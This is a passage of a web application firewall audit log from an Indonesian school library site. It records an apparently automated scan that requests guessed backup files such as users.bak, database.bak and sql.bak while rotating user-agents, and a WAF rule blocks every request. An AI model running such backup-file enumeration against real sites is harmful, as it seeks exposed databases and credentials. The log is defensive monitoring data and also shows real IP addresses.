perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224497 --e37d2a24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e37d2a24-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882268558 2328 (- - -) Stopwatch2: 1747543882268558 2328; combined=878, p1=435, p2=415, p3=0, p4=0, p5=28, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e37d2a24-Z-- --84941e7b-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0gAAAIo 103.236.140.4 56816 103.236.140.4 8181 --84941e7b-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224502 --84941e7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --84941e7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882274176 1911 (- - -) Stopwatch2: 1747543882274176 1911; combined=683, p1=355, p2=301, p3=0, p4=0, p5=26, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84941e7b-Z-- --edc1c561-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0wAAAI4 103.236.140.4 56816 103.236.140.4 8181 --edc1c561-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224507 --edc1c561-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edc1c561-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882277936 1599 (- - -) Stopwatch2: 1747543882277936 1599; combined=653, p1=306, p2=282, p3=0, p4=0, p5=65, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edc1c561-Z-- --2956374f-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8pAAAAAs 103.236.140.4 56796 103.236.140.4 8181 --2956374f-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175755 --2956374f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2956374f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882290179 1710 (- - -) Stopwatch2: 1747543882290179 1710; combined=684, p1=330, p2=326, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2956374f-Z-- --914daf7d-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS1wAAAI0 103.236.140.4 56816 103.236.140.4 8181 --914daf7d-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224510 --914daf7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --914daf7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882291441 1914 (- - -) Stopwatch2: 1747543882291441 1914; combined=681, p1=336, p2=319, p3=0, p4=0, p5=26, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --914daf7d-Z-- --8e0cf241-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS2AAAAJg 103.236.140.4 56816 103.236.140.4 8181 --8e0cf241-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:60.2.1) Gecko/20100101 Firefox/60.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224517 --8e0cf241-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8e0cf241-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882296497 2089 (- - -) Stopwatch2: 1747543882296497 2089; combined=861, p1=428, p2=394, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e0cf241-Z-- --2bb40029-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS2gAAAJA 103.236.140.4 56816 103.236.140.4 8181 --2bb40029-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224530 --2bb40029-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bb40029-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882308699 1590 (- - -) Stopwatch2: 1747543882308699 1590; combined=647, p1=310, p2=311, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb40029-Z-- --ce9c6d04-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8pwAAABQ 103.236.140.4 56796 103.236.140.4 8181 --ce9c6d04-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224557 --ce9c6d04-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce9c6d04-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882345898 1875 (- - -) Stopwatch2: 1747543882345898 1875; combined=674, p1=300, p2=348, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce9c6d04-Z-- --d83d4d1b-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8qwAAABI 103.236.140.4 56796 103.236.140.4 8181 --d83d4d1b-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224584 --d83d4d1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d83d4d1b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882848845 3194 (- - -) Stopwatch2: 1747543882848845 3194; combined=1022, p1=371, p2=612, p3=0, p4=0, p5=38, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d83d4d1b-Z-- --1dc99d3e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8rgAAAAE 103.236.140.4 56796 103.236.140.4 8181 --1dc99d3e-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093319 --1dc99d3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1dc99d3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882916278 1940 (- - -) Stopwatch2: 1747543882916278 1940; combined=806, p1=446, p2=332, p3=0, p4=0, p5=28, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc99d3e-Z-- --52899425-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8rwAAABA 103.236.140.4 56796 103.236.140.4 8181 --52899425-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093322 --52899425-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52899425-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882928863 2467 (- - -) Stopwatch2: 1747543882928863 2467; combined=964, p1=515, p2=419, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52899425-Z-- --c5039d03-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS3gAAAJE 103.236.140.4 56816 103.236.140.4 8181 --c5039d03-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 61846747 --c5039d03-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5039d03-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882964688 2053 (- - -) Stopwatch2: 1747543882964688 2053; combined=694, p1=324, p2=343, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5039d03-Z-- --ab633014-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS4AAAAJM 103.236.140.4 56816 103.236.140.4 8181 --ab633014-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 61846761 --ab633014-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ab633014-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882983928 1698 (- - -) Stopwatch2: 1747543882983928 1698; combined=678, p1=311, p2=339, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab633014-Z-- --598e7f19-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8tgAAAAI 103.236.140.4 56796 103.236.140.4 8181 --598e7f19-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224643 --598e7f19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --598e7f19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882989442 1690 (- - -) Stopwatch2: 1747543882989442 1690; combined=677, p1=317, p2=331, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --598e7f19-Z-- --b939f822-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8vAAAAA0 103.236.140.4 56796 103.236.140.4 8181 --b939f822-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224678 --b939f822-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b939f822-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883052263 1787 (- - -) Stopwatch2: 1747543883052263 1787; combined=714, p1=345, p2=341, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b939f822-Z-- --b883f829-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8vgAAAAA 103.236.140.4 56796 103.236.140.4 8181 --b883f829-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224696 --b883f829-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b883f829-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883077502 1559 (- - -) Stopwatch2: 1747543883077502 1559; combined=637, p1=314, p2=296, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b883f829-Z-- --c5d14339-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8wAAAABQ 103.236.140.4 56796 103.236.140.4 8181 --c5d14339-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609722 --c5d14339-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5d14339-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883083807 1818 (- - -) 